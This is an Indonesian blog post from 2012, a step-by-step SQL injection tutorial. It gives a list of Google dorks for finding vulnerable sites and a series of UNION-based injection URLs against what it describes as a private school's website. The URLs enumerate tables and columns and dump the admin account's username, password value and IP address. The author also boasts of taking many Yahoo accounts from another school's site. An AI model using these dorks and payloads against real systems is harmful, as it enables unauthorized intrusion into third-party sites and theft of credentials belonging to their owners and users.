Sabtu, 29 Desember 2012

Sql injection

Dalam hal ini dari pihak client, sehingga bila kita memodifikasi perintah-perintah sql akan terlihat langsung di browser.

Bahan:

1. Otomatis :
- schemafuzz.py
- python

2. Manual :
- Komputer.
- Akses Internet
- Target yang vulner
- Sedikit pengetahuan tentang md5
- Ketabahan dan kesabaran

Langsung dimulai aja.

wudhlu terlebih dahulu (biar yang kita lakukan jadi halal)

- Buka browser terserah IE to Firefox, kalo aq biasa pake firefox.
- Buka uncle google atau terserah buat ngesearch doank atau pake dork tools kalau punya.


contoh dork:

# SQL Injection Dork List #

index.php?option=com_mambads

inurl:index.php?option=com_expose

intitle:guestbook "advanced guestbook 2.2 powered"

filetype:asp inurl:"shopdisplayproducts.asp

"Powered by: vBulletin * 3.0.1" inurl:newreply.php

"Powered by Invision Power Board(U) v1.3 Final"

inurl:gotoURL.asp?url=

inurl:comersus_message.asp

ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input

inurl:"dispatch.php?atknodetype"
inurl:class.at

"Powered by Gallery v1.4.4"

inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca

inurl:"/becommunity/community/index.php?pageurl="

"Powered *: newtelligence" ("dasBlog 1.6"
"dasBlog 1.5"
"dasBlog 1.4"
"dasBlog 1.3")

filetype:cgi inurl:tseekdir.cgi

filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages
viewpage
listcat)

intitle:"WordPress > * > Login form" inurl:"wp-login.php"

intitle: Index of finance.xls

intitle:index.of passwd passwd.bak

allinurl:loc_id "mod.php?mod=calendar"

allinurl:"mod php mod publisher"artid

allinurl:"mod.php?mod=gallery" id


langkah 1:

- langsung di search aja, trus tinggal tunggu hasilnya'

- Untuk kali ini aku dapet dua target nie yang vurlner (sebenernya banyak sih, tapi males).


Langkah 2:

- masukan karakter "'" atau "-" (tanpa kutip) pada akhir url sampai terjadi error

contoh:

[target]/news_detail.php?idberita=-61

[target]/news_detail.php?idberita=61--

[target]/news_detail.php?idberita=61' atau

[target]/news_detail.php?idberita=61/* dan masih banyak lagi

sehingga muncul pesan error.

http://www.target.sch.id/news_detail.php?idberita=-61 (salah stu website sekolah swasta di Solo).


Langkah 3:

- Mencari tahu jumlah colom yang terdapat pada database website

menggunakan perintah: "order by"

contoh:

http://www.target.sch.id/news_detail.php?idberita=-61+order+by+1-- (chek satu per satu sampai terlihat perbedaan tampilan websitenya).

http://www.target.sch.id/news_detail.php?idberita=-61+order+by+2-- masih error

http://www.target.sch.id/news_detail.php?idberita=-61+order+by+3-- masih error

http://www.target.sch.id/news_detail.php?idberita=-61+order+by+4-- masih error

http://www.target.sch.id/news_detail.php?idberita=-61+order+by+5-- masih error

----

----

http://www.target.sch.id/news_detail.php?idberita=-61+order+by+9-- masih error

http://www.target.sch.id/news_detail.php?idberita=-61+order+by+10-- tidak error (atau kebalikannya).


berarti jumlah colomnya 8 buah


Langkah 4:

- mencari angka ajaib dengan menggunakan perintah union select

contoh:

http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,2,3,4,5,6,7,8,9--

keluar angka 2 pada website yang menjadi target tersebut


Langkah 5:

- Mencari versi dari sql yang digunakan database target menggunakan perintah @@version atau version().

contoh:

http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,version(),3,4,5,6,7,8,9--

eh ternyata versi 5.xx (alhamdulillah... ndak sia sia usahaku,,,)

bagi yang nemu versi 4 atau yang lain ndak usah berkecil hati,

ganti target baru atau pake blind sql injection. pake schemafuzz juga bisa (bagi para pemalas :D~ seperti aq)

lanjut...!!!!!!


Langkah 6:

- Mencari tahu table apa saja database yang terdapat dalam data base.

perintah table_name : dimasukan pada angka ajaib.

perintah +from+information_schema.tables-- : dimasukan setelah angka terakhir.

contoh:

http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables--

keluar table: tbpolling


langkah 7:

- Memunculkan semua isi yang ada dalam table tersebut.

perintah group_concat(table_name) : dimasukan pada angka ajaib.

perintah +from+information_schema.tables+where+table_schema=database() : dimasukan setelah angka terakhir.

contoh:

http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,perintah group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--

keluar: komentar_madding,lulus,naikkelas,psb,tb_agenda,tb_alumni,tb_berita,tb_bukutamu,tb_ekstra,tb_forum,tb_guru,tb_header,tb_kategori,tb_kategori_ekstra,tb_kategori_guru,tb_kategori_kelas,tb_kategori_photo,tb_kelas,tb_komentar,tb_madding,tb_mata_pelajaran,tb_materi,tb_photo,tb_siswa,tb_skor,tb_soal,tb_user,tbjawabpolling,tbpolling


Langkah 8:

- Memunculkan isi table

perintah group_concat(column_name) : dimasukan pada angka ajaib.

perintah +from+information_schema.columns+where+table_name=0xhexa-- : dimasukan setelah angka terakhir

Contoh:

http://www.target.sch.id/news_detail.php?idberita=-61+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x74625f75736572--

0xhexa :convert an dari nama table ( pada kasus ini "tb_user" menjadi 74625f75736572)

silahkan tanya uncle google ajalah. Disini bukan tempat orang-orang manja!!!!!!!! googling sana!!!! lanjut!!!!

muncul user_id,username,user_pass,level,priv_halaman,nama,alamat,telp,photo1_status,last_visit,last_ip,status


Langkah 9:

- Memunculkan isi data dari colom tersebut

perintah concat_ws(0x3a,hasil dari isi column) >>> dimasukan pada angka ajaib

perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir.

Contoh:

http://www.target.sch.id//news_detail.php?idberita=-61+union+select+1,concat_ws(0x3a,user_id,username,user_pass,level,priv_halaman,nama,alamat,telp,photo1_status,last_visit,last_ip,status),3,4,5,6,7,8,9+from+tb_user--

keluar deh:

:admin:AzFfblBjUWJTbQZv:10::Administrator::817897187:0:1256536540:125.163.200.15:1


username :admin

password :AzFfblBjUWJTbQZv

Tinggal di crack pake md5 decrypter, tanya uncle google lagi sono!!!!!

(sampai tanggal tutorial ini diposting aku belum bisa nemu decrypt dari passwordnya).

Setelah itu aku ganti target dah. tapi tetep....

website sekolah, tapi yang luar kota hehehe (dapet account yahoo banyak disini :D~).

jeleknya lagi password admin masih blum terpecahkan, kalo temen temen tau aku kasih tau ya!!!!!!!!!!


Langkah 10:

- MEncari halaman Login admin dan sign in sebagai administrator website tersebut.

0 komentar:

Posting Komentar